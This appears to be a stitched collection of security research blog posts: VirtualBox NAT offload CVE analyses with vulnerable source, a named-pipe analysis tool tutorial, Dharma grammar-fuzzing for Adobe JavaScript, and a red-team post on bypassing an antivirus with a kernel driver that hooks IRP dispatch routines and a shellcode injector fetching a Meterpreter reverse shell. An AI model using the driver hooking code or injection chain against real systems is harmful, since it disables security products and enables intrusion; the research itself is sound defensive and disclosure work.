Everything that we did earlier was related to fuzzing the APIs and JavaScript's grammar, but we found two interesting functions used to compile and ensure the validity of that module, compile and validate functions. Both of these two function receive a .wasm module. The first function compiles WebAssembly binary code into a WebAssembly module, the second function returns whether the bytes from a .wasm module are valid (true) or not (false).

For both compile and validate, we made a .wasm corpus (by building or collecting), then we used Radamsa to mutate the binary of these files before we imported them from our two functions.

We improved the mutation by skipping the first part of the .wasm module which contains the header of the file (magic number and version), and start to mutate the actual wat instructions.

Stay tuned for the final part of our Dharma blog series, where we implement more advanced grammar files. Happy Hunting!!

Join Us

Offres Thalium Dans le cadre de nos travaux R&D ou pour nos besoins clients, l’équipe Thalium développe son expertise autour des domaines suivants : Recherche et exploitation de vulnérabilités Fuzzing Développements kernel / userland Connaissance de la menace et investigation numérique Et ce sur de multiples plateformes : Windows, Linux, macOS Android, iOS, IOT Intel, ARM Pour répondre aux challenges de plus en plus nombreux, nous recherchons continuellement de nouveaux experts pour nos équipes Reverse, Développements ou encore Forensics.

GSOh No! Hunting for Vulnerabilities in VirtualBox Network Offloads

Introduction

The Pwn2Own contest is like Christmas for me. It’s an exciting competition which involves rummaging around to find critical vulnerabilities in the most commonly used (and often the most difficult) software in the world. Back in March, I was preparing to have a pop at the Vancouver contest and had decided to take a break from writing browser fuzzers to try something different: VirtualBox.

Virtualization is an incredibly interesting target. The complexity involved in both emulating hardware devices and passing data safely to real hardware is astounding. And as the mantra goes: where there is complexity, there are bugs.

For Pwn2Own, it was a safe bet to target an emulated component. In my eyes, network hardware emulation seemed like the right (and usual) route to go. I started with a default component: the NAT emulation code in /src/VBox/Devices/Network/DrvNAT.cpp.

At the time, I just wanted to get a feel for the code, so there was no specific methodical approach to this other than scrolling through the file and reading various parts.

During my scrolling adventure, I landed on something that caught my eye:

static DECLCALLBACK(void) drvNATSendWorker(PDRVNAT pThis, PPDMSCATTERGATHER pSgBuf)
{
#if 0 /* Assertion happens often to me after resuming a VM -- no time to investigate this now. */
   Assert(pThis->enmLinkState == PDMNETWORKLINKSTATE_UP);
#endif
   if (pThis->enmLinkState == PDMNETWORKLINKSTATE_UP)
   {
       struct mbuf *m = (struct mbuf *)pSgBuf->pvAllocator;
       if (m)
       {
           /*
            * A normal frame.
            */
           pSgBuf->pvAllocator = NULL;
           slirp_input(pThis->pNATState, m, pSgBuf->cbUsed);
       }
       else
       {
           /*
            * GSO frame, need to segment it.
            */
           /** @todo Make the NAT engine grok large frames?  Could be more efficient... */
#if 0 /* this is for testing PDMNetGsoCarveSegmentQD. */
           uint8_t         abHdrScratch[256];
#endif
           uint8_t const  *pbFrame = (uint8_t const *)pSgBuf->aSegs[0].pvSeg;
           PCPDMNETWORKGSO pGso    = (PCPDMNETWORKGSO)pSgBuf->pvUser;
           uint32_t const  cSegs   = PDMNetGsoCalcSegmentCount(pGso, pSgBuf->cbUsed);  Assert(cSegs > 1);
           for (uint32_t iSeg = 0; iSeg pNATState, pGso->cbHdrsTotal + pGso->cbMaxSeg, &pvSeg, &cbSeg);
               if (!m)
                   break;
 
#if 1
               uint32_t cbPayload, cbHdrs;
               uint32_t offPayload = PDMNetGsoCarveSegment(pGso, pbFrame, pSgBuf->cbUsed,
                                                           iSeg, cSegs, (uint8_t *)pvSeg, &cbHdrs, &cbPayload);
               memcpy((uint8_t *)pvSeg + cbHdrs, pbFrame + offPayload, cbPayload);
 
               slirp_input(pThis->pNATState, m, cbPayload + cbHdrs);
#else
...

The function used for sending packets from the guest to the network contained a separate code path for Generic Segmentation Offload (GSO) frames and was using memcpy to combine pieces of data.

The next question was of course “How much of this can I control?” and after going through various code paths and writing a simple Python-based constraint solver for all the limiting factors, the answer was “More than I expected” when using the Paravirtualization Network device called VirtIO.

Paravirtualized Networking

An alternative to fully emulating a device is to use paravirtualization. Unlike full virtualization, in which the guest is entirely unaware that it is a guest, paravirtualization has the guest install drivers that are aware that they are running in a guest machine in order to work with the host to transfer data in a much faster and more efficient manner.

VirtIO is an interface that can be used to develop paravirtualized drivers. One such driver is virtio-net, which comes with the Linux source and is used for networking. VirtualBox, like a number of other virtualization software, supports this as a network adapter:

The Adapter Type options

Similarly to the e1000, VirtIO networking works by using ring buffers to transfer data between the guest and the host (In this case called Virtqueues, or VQueues). However, unlike the e1000, VirtIO doesn’t use a single ring with head and tail registers for transmitting but instead uses three separate arrays:

  • A Descriptor array that contains the following data per-descriptor:
    • Address – The physical address of the data being transferred.
    • Length – The length of data at the address.
    • Flags – Flags that determine whether the Next field is in-use and whether the buffer is read or write.
    • Next – Used when there is chaining.
  • An Available ring – An array that contains indexes into the Descriptor array that are in use and can be read by the host.
  • A Used ring – An array of indexes into the Descriptor array that have been read by the host.

This looks as so:

When the guest wishes to send packets to the network, it adds an entry to the descriptor table, adds the index of this descriptor to the Available ring, and then increments the Available Index pointer:

Once this is done, the guest ‘kicks’ the host by writing the VQueue index to the Queue Notify register. This triggers the host to begin handling descriptors in the available ring. Once a descriptor has been processed, it is added to the Used ring and the Used Index is incremented:

Generic Segmentation Offload

Next, some background on GSO is required. To understand the need for GSO, it’s important to understand the problem that it solves for network cards.

Originally the CPU would handle all of the heavy lifting when calculating transport layer checksums or segmenting them into smaller ethernet packet sizes. Since this process can be quite slow when dealing with a lot of outgoing network traffic, hardware manufacturers started implementing offloading for these operations, thus removing the strain on the operating system.

For segmentation, this meant that instead of the OS having to pass a number of much smaller packets through the network stack, the OS just passes a single packet once.

It was noticed that this optimization could be applied to other protocols (beyond TCP and UDP) without the need of hardware support by delaying segmentation until just before the network driver receives the message. This resulted in GSO being created.

Since VirtIO is a paravirtualized device, the driver is aware that it is in a guest machine and so GSO can be applied between the guest and host. GSO is implemented in VirtIO by adding a context descriptor header to the start of the network buffer. This header can be seen in the following struct:

struct VNetHdr
{
   uint8_t  u8Flags;
   uint8_t  u8GSOType;
   uint16_t u16HdrLen;
   uint16_t u16GSOSize;
   uint16_t u16CSumStart;
   uint16_t u16CSumOffset;
};

The VirtIO header can be thought of as a similar concept to the Context Descriptor in e1000.

When this header is received, the parameters are verified for some level of validity in vnetR3ReadHeader. Then the function vnetR3SetupGsoCtx is used to fill the standard GSO struct used by VirtualBox across all network devices:

typedef struct PDMNETWORKGSO
{
   /** The type of segmentation offloading we're performing (PDMNETWORKGSOTYPE). */
   uint8_t             u8Type;
   /** The total header size. */
   uint8_t             cbHdrsTotal;
   /** The max segment size (MSS) to apply. */
   uint16_t            cbMaxSeg;
 
   /** Offset of the first header (IPv4 / IPv6).  0 if not not needed. */
   uint8_t             offHdr1;
   /** Offset of the second header (TCP / UDP).  0 if not not needed. */
   uint8_t             offHdr2;
   /** The header size used for segmentation (equal to offHdr2 in UFO). */
   uint8_t             cbHdrsSeg;
   /** Unused. */
   uint8_t             u8Unused;
} PDMNETWORKGSO;

Once this has been constructed, the VirtIO code creates a scatter-gatherer to assemble the frame from the various descriptors:

          /* Assemble a complete frame. */
               for (unsigned int i = 1; i  0; i++)
               {
                   unsigned int cbSegment = RT_MIN(uSize, elem.aSegsOut[i].cb);
                   PDMDevHlpPhysRead(pDevIns, elem.aSegsOut[i].addr,
                    
                                     ((uint8_t*)pSgBuf->aSegs[0].pvSeg) + uOffset,
                                     cbSegment);
                   uOffset += cbSegment;
                   uSize -= cbSegment;
               }

The frame is passed to the NAT code along with the new GSO structure, reaching the point that drew my interest originally.

Vulnerability Analysis

CVE-2021-2145 – Oracle VirtualBox NAT Integer Underflow Privilege Escalation Vulnerability

When the NAT code receives the GSO frame, it gets the full ethernet packet and passes it to Slirp (a library for TCP/IP emulation) as an mbuf message. In order to do this, VirtualBox allocates a new mbuf message and copies the packet to it. The allocation function takes a size and picks the next largest allocation size from three distinct buckets:

  1. MCLBYTES (0x800 bytes)
  2. MJUM9BYTES (0x2400 bytes)
  3. MJUM16BYTES (0x4000 bytes)
struct mbuf *slirp_ext_m_get(PNATState pData, size_t cbMin, void **ppvBuf, size_t *pcbBuf)
{
   struct mbuf *m;
   int size = MCLBYTES;
   LogFlowFunc(("ENTER: cbMin:%d, ppvBuf:%p, pcbBuf:%p\n", cbMin, ppvBuf, pcbBuf));
 
   if (cbMin 

If the supplied size is larger than MJUM16BYTES, an assertion is triggered. Unfortunately, this assertion is only compiled when the RT_STRICT macro is used, which is not the case in release builds. This means that execution will continue after this assertion is hit, resulting in a bucket size of 0x800 being selected for the allocation. Since the actual data size is larger, this results in a heap overflow when the user data is copied into the mbuf.

/** @def AssertMsgFailed
* An assertion failed print a message and a hit breakpoint.
*
* @param   a   printf argument list (in parenthesis).
*/
#ifdef RT_STRICT
# define AssertMsgFailed(a)  \
   do { \
       RTAssertMsg1Weak((const char *)0, __LINE__, __FILE__, RT_GCC_EXTENSION __PRETTY_FUNCTION__); \
       RTAssertMsg2Weak a; \
       RTAssertPanic(); \
   } while (0)
#else
# define AssertMsgFailed(a)     do { } while (0)
#endif

CVE-2021-2310 - Oracle VirtualBox NAT Heap-based Buffer Overflow Privilege Escalation Vulnerability

Throughout the code, a function called PDMNetGsoIsValid is used which verifies whether the GSO parameters supplied by the guest are valid. However, whenever it is used it is placed in an assertion. For example:

DECLINLINE(uint32_t) PDMNetGsoCalcSegmentCount(PCPDMNETWORKGSO pGso, size_t cbFrame)
{
   size_t cbPayload;
   Assert(PDMNetGsoIsValid(pGso, sizeof(*pGso), cbFrame));
   cbPayload = cbFrame - pGso->cbHdrsSeg;
   return (uint32_t)((cbPayload + pGso->cbMaxSeg - 1) / pGso->cbMaxSeg);
}

As mentioned before, assertions like these are not compiled in the release build. This results in invalid GSO parameters being allowed; a miscalculation can be caused for the size given to slirp_ext_m_get, making it less than the total copied amount by the memcpy in the for-loop. In my proof-of-concept, my parameters for the calculation of pGso->cbHdrsTotal + pGso->cbMaxSeg used for cbMin resulted in an allocation of 0x4000 bytes, but the calculation for cbPayload resulted in a memcpy call for 0x4065 bytes, overflowing the allocated region.

CVE-2021-2442 - Oracle VirtualBox NAT UDP Header Out-of-Bounds

The title of this post makes it seem like GSO is the only vulnerable offload mechanism in place here; however, another offload mechanism is vulnerable too: Checksum Offload.

Checksum offloading can be applied to various protocols that have checksums in their message headers. When emulating, VirtualBox supports this for both TCP and UDP.

In order to access this feature, the GSO frame needs to have the first bit of the u8Flags member set to indicate that the checksum offload is required. In the case of VirtualBox, this bit must always be set since it cannot handle GSO without performing the checksum offload. When VirtualBox handles UDP packets with GSO, it can end up in the function PDMNetGsoCarveSegmentQD in certain circumstances:

       case PDMNETWORKGSOTYPE_IPV4_UDP:
           if (iSeg == 0)
               pdmNetGsoUpdateUdpHdrUfo(RTNetIPv4PseudoChecksum((PRTNETIPV4)&pbFrame[pGso->offHdr1]),
                                        pbSegHdrs, pbFrame, pGso->offHdr2);

The function pdmNetGsoUpdateUdpHdrUfo uses the offHdr2 to indicate where the UDP header is in the packet structure. Eventually this leads to a function called RTNetUDPChecksum:

RTDECL(uint16_t) RTNetUDPChecksum(uint32_t u32Sum, PCRTNETUDP pUdpHdr)
{
   bool fOdd;
   u32Sum = rtNetIPv4AddUDPChecksum(pUdpHdr, u32Sum);
   fOdd = false;
   u32Sum = rtNetIPv4AddDataChecksum(pUdpHdr + 1, RT_BE2H_U16(pUdpHdr->uh_ulen) - sizeof(*pUdpHdr), u32Sum, &fOdd);
   return rtNetIPv4FinalizeChecksum(u32Sum);
}

This is where the vulnerability is. In this function, the uh_ulen property is completely trusted without any validation, which results in either a size that is outside of the bounds of the buffer, or an integer underflow from the subtraction of sizeof(*pUdpHdr).

rtNetIPv4AddDataChecksum receives both the size value and the packet header pointer and proceeds to calculate the checksum:

   /* iterate the data. */
   while (cbData > 1)
   {
       u32Sum += *pw;
       pw++;
       cbData -= 2;
   }

From an exploitation perspective, adding large amounts of out of bounds data together may not seem particularly interesting. However, if the attacker is able to re-allocate the same heap location for consecutive UDP packets with the UDP size parameter being added two bytes at a time, it is possible to calculate the difference in each checksum and disclose the out of bounds data.

On top of this, it’s also possible to use this vulnerability to cause a denial-of-service against other VMs in the network:

Got another Virtualbox vuln fixed (CVE-2021-2442)

Works as both an OOB read in the host process, as well as an integer underflow. In some instances, it can also be used to remotely DoS other Virtualbox VMs! pic.twitter.com/Ir9YQgdZQ7

— maxpl0it (@maxpl0it) August 1, 2021

Outro

Offload support is commonplace in modern network devices so it’s only natural that virtualization software emulating devices does it as well. While most public research has been focused on their main components, such as ring buffers, offloads don’t appear to have had as much scrutiny. Unfortunately in this case I didn’t manage to get an exploit together in time for the Pwn2Own contest, so I ended up reporting the first two to the Zero Day Initiative and the checksum bug to Oracle directly.

MindShaRE: Using IO Ninja to Analyze NPFS

In this installment of our MindShaRE series, ZDI vulnerability researcher Michael DePlante describes how he uses the IO Ninja tool for reverse engineering and software analysis. According to its website, IO Ninja provides an “all-in-one terminal emulator, sniffer, and protocol analyzer.” The tool provides many options for researchers but can leave new users confused about where to begin. This blog provides a starting point for some of the most commonly used features. 


Looking at a new target can almost feel like meeting up with someone who’s selling their old car. I’m the type of person who would want to inspect the car for rust, rot, modifications, and other red flags before I waste the owner’s or my own time with a test drive. If the car isn’t super old, having an OBD reader (on-board diagnostics) may save you some time and money. After the initial inspection, a test drive can be critical to your decision. 

Much like checking out a used car, taking software for test drives as a researcher with the right tools is a wonderful way to find issues. In this blog post, I would like to highlight a tool that I have found incredibly handy to have in my lab – IO Ninja.

Lately, I have been interested in antivirus products, mainly looking for local privilege escalation vulnerabilities. After looking at several vendors including Avira, Bitdefender, ESET, Panda Security, Trend Micro, McAfee, and more, I started to notice that almost all of them utilize the Named Pipe Filesystem (NPFS). Furthermore, NPFS is used in many other product categories including virtualization, SCADA, license managers/updaters, etc.

I began doing some research and realized there were not many tools that let you locally sniff and connect to these named pipes easily in Windows. The Sysinternals suite has a tool called Pipelist and it works exactly as advertised. Pipelist can enumerate open pipes at runtime but can leave you in the dark about pipe connections that are opening and closing frequently. Another tool also in the Sysinternals suite called Process Explorer allows you to view open pipes but only shows them when you are actively monitoring a given process. IO Ninja fills the void with two great plugins it offers.

An Introduction to IO Ninja  

When you fire up IO Ninja and start a new session, you’re presented with an expansive list of plugins as shown below. I will be focusing on two of the plugins under the “File Systems” section in this blog: Pipe Monitor and Pipe Server.  

Before starting a new session, you may need to check the “Run as Administrator” box if the pipes you want to interact with require elevated privileges to read or write. You can inspect the permissions on a given pipe with the accesschk tool from the Sysinternals Suite:

The powerful Pipe Monitor plugin in IO Ninja allows you to record communication, as well as apply filters to the log. The Pipe Server plugin allows you to connect to the client side of a pipe. 

IO Ninja: Pipe Monitor

The following screenshot provides a look at the Pipe Monitor plugin that comes by default with IO Ninja.

In the above screenshot, I added a process filter (*chrome*) and started recording before I opened the application. You can also filter on a filename ( name of the pipe), PID, or file ID. After starting Chrome, data started flowing between several pipe instances. This is a terrific way to dynamically gather an understanding of what data is going through each pipe and when those pipes are opened and closed. I found this helpful when interacting with antivirus agents and wanted to know what pipes were being opened or closed based on certain actions from the user, such as performing a system scan or update. It can also be interesting to see the content going across the pipe, especially if it contains sensitive data and the pipe has a weak ACL.

It can also help a developer debug an application and find issues in real-time like unanswered pipe connections or permission issues as shown below. 

Using IO Ninja’s find text/bin feature to search for “cannot find”, I was able to identify several connections in the log below where the client side of a connection could not find the server side. In my experience, many applications make these unanswered connections out of the box.

What made this interesting was that the process updatesrv.exe, running as NT AUTHORITY\SYSTEM, tried to open the client side of a named pipe but failed with ERROR_FILE_NOT_FOUND. We can fill the void by creating our own server with the name it is looking for and then triggering the client connection by initiating an update within the user interface.

As a low privileged user, I am now able to send arbitrary data to a highly privileged process using the Pipe Server plugin. This could potentially result in a privilege escalation vulnerability, depending on how the privileged process handles the data I am sending it.

IO Ninja: Pipe Server

The Pipe Server plugin is powerful as it allows you to send data to specific client connections from the server side of a pipe. The GUI in IO Ninja allows you to select which conversation you’d like to interact with by selecting from a drop-down list of Client IDs. Just like with the Pipe Monitor plugin, you can apply filters to clean up the log. Below you’ll find a visual from the Pipe Server plugin after starting the server end of a pipe and getting a few client connections.  

In the bottom right of the previous image, you can see the handy packet library. Other related IO Ninja features include a built-in hex editor, file- and script-based transmission, and packet templating via the packet template editor.

The packet template editor allows you to create packet fields and script custom actions using the Jancy scripting language. Fields are visualized in the property grid as shown above on the bottom left-hand side of the image, where they can be edited. This feature makes it significantly easier to create and modify packets when compared to just using a hex editor.

Conclusion

This post only scratches the surface of what IO Ninja can do by highlighting just two of the plugins offered. The tool is scriptable and provides an IDE that encourages users to build, extend or modify existing plugins.  The plugins are open source and available in a link listed at the end of the blog. I hope that this post inspires you to take a closer look at NPFS as well as the IO Ninja tool and the other plugins it offers.

Keep an eye out for future blogs where I will go into more detail on vulnerabilities I have found in this area. Until then, you can follow me @izobashi and the team @thezdi on Twitter for the latest in exploit techniques and security patches.

Additional information about IO Ninja can be found on their website. All of IO Ninja’s plugins are open source and available here.

Additional References

If you are interested in learning more you can also check out the following resources which I found helpful.

Microsoft - Documentation: Named Pipes

Gil Cohen - Call the plumber: You have a leak in your named pipe

0xcsandker - Offensive Windows IPC Internals 1: Named Pipes

MindShaRE: Using IO Ninja to Analyze NPFS

Introduction to Dharma - Part 1

While targeting Adobe Acrobat JavaScript APIs, we were not only focusing on performance and the number of cases generated per second, but also on effective generation of valid inputs that cover different functionalities and uncover new vulnerabilities.

Obtaining inputs from mutational-based input generators helped us in quickly generating random inputs; however due to the randomness of the mutations that were generated, great majority of that input was invalid.

So, we utilized a well-known grammar-based input generator called Dharma to produce inputs that are semantically reasonable and follow the syntactic rules of JavaScript.

In this blog post, we will explain what Dharma is, how to set it up and finally demonstrate how to use it to generate valid Adobe Acrobat JavaScript API calls which can be wrapped in PDF file format.


So, What is dharma?

Dharma was created by Mozilla in 2015. It's a tool used to create test cases for fuzzing of structured text inputs, such as markup and script. Dharma takes a custom high-level grammar format as input and produces random well-formed test cases as output.

Dharma can be installed from the following GitHub repo.


Why use Dharma?

By using Dharma, a fuzzer can generate inputs that are valid according to that grammar requirements. To generate an input using Dharma, the input model must be stated. It will be difficult to write a grammar files for a model that is proprietary, unknown, or very complex.

However, we do have knowledge of APIs and objects that we're targeting, by using the publicly available JavaScript API documentation provided by Adobe.


How to use Dharma?

Using dharma is straight forward, it takes a grammar file with dg extension and starts generating random inputs based on the grammar file that is provided.

A grammar file generally needs to contain 3 sections, and they are:

  1. Value

  2. Variable

  3. Variance

Note that the Variable section is not mandatory. Each section has a purpose and specifications,

The syntax to declare a section: %section% := section

  • The "value" section is where we define values that are interchangeable - think of it as an OR/SWITCH.

a value can be referenced in the grammar file using +value+, for example +cName+.

  • The "variable" section is where we define variables to be used as a context to be used in generating different code.

a variable can be referenced from the value section by using two exclamation marks

  • The "variance" section is where we put everything together.

if we run the previous example of the three sections, one of the generated files will be similar to the following JS code:

Building Grammar Files

In this section we'll walk through an example of how to build a grammar file based on a real life scenario. We will try to build a grammar file for the Thermometer object from Adobe javascript documentation.

%section% := variable

The Thermometer objects can be referenced through "app.thermometer" - which is the first thing we need to implement:

The easiest way to get a reference to the Thermometer object is from the app object (app.therometer):

%section% := value

Looking at the documentation of the Thermometer object, we can see that it has four properties:

We need to assign values properties based on their types.

In this case, the cancelled property's type is a boolean, Duration is number, text is a string and the value property is a number. That said, we'll have to implement getters and setters for these properties. The setter implementation should look similar to the following:

Now that we have implemented setters for the properties, Dharma will pick random setter definition from the defined therometer_setters.

For the value property, it will set a random number using +common:number+, a random character for the text property using +common:character+, a random number from 0 to 10000 for the duration property and a Boolean value for the cancelled property using +common:bool+.

Those values were referenced from a grammar file shipped with dharma called common.dg.

We're now done with the setters, next up is implementing the getters which is fairly easy. We can create a value with all the properties, and then another value to pick a random property from thermometer_properties:

In the above grammar we used x+common:digit+ to generate random JavaScript variables to store the properties values in it, for example, x1, x2, x3, …etc.

We're officially done with properties. Next we'll have to implement the methods. The Thermometer object has two methods - begin and end. Luckily, those two functions do not require any arguments passed:

We have everything implemented. One last thing we need to implement in the value section is the wrapper. The wrapper simply try/catch's the code generated:

Finally the variance section - which invokes the wrapper from the main:

%section% := variance

Putting it all together:

Running our grammar file, generates the following output:

The generated JS code can be then embedded into PDF files for testing. Or we can dump the generated code to a JS file by using ">>" from the cmd

Now let's move on to a more complex example - building a grammar file for the spell object.

We will use the same methodology we used above, starting with implementing getters/setters for the properties followed by implementing the methods. Looking at the documentation of the spell object properties:

%section% := value

Note that we will constantly use +fuzzlogics+ keyword, which is a reference from another grammar file that our fuzzer will use to place some random values.

In this case, we'll make the getter/setter implementation simpler. We'll have the setter set random values to any properties regardless of the type. The getter is almost the same as the example above:

Now we're going to implement the methods. To avoid spoiling the fun for you, we'll not implement all the methods in the spell object, just a few for demonstration purposes :)

These are all the methods for the spell object, each method takes a certain number of arguments with different types, so we need a value for each method. Let's start with spell.addDictionary() arguments:

Looking at addDictionary method, it takes three arguments, cFile, cName and bShow. The last argument (bShow) is optional, so we implemented two logics for addDictionary arguments to cover as many scenarios as we can. One with all three arguments and another with only two arguments since the last one is optional.

For the cFile argument, we're referencing an ASCII Unicode value from the fuzzlogics.dg (the dictionary we customly implemented for this purpose).

Now let's implement the spell.check() arguments.

spell.check() function takes two optional arguments, aDomain and aDictionary. So we can either pass aDomain only, aDictionary only, both or no arguments at all.

The first logic "{}" is no argument, the second one is both aDictionary and aDomain, the third one is aDomain, the last one is aDictionary only.

The same methodology is used for the rest of the methods, so we're not going to cover all available methods. The last thing we need to implement is the wrapper:

As we mentioned earlier, the wrapper is used to wrap everything between a try/catch so that any error would be suppressed. Finally, the variance section:

In the next part we will expand further into Dharma, focusing on a specific case study where Dharma was essential to the process of vulnerability discovery. Hopefully this introduction catches you up to speed with grammar fuzzing and its inner workings.

As always, happy hunting :)

Kernel Karnage – Part 3 (Challenge Accepted)

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBALS?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good -although easy to detect- way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
	UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	auto status = STATUS_UNSUCCESSFUL;
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}
void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
	for (int i = 0; i < MaxIntercept; i++) {
		if (globals.Drivers[i].DriverObject == DriverObject) {
			if (globals.Drivers[i].DriverUnload) {
				globals.Drivers[i].DriverUnload(DriverObject);
			}
			UnhookDriver(i);
		}
	}
	NT_ASSERT(false);
}

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I chose for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load-, registry- and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

This is how I bypassed almost every EDR!

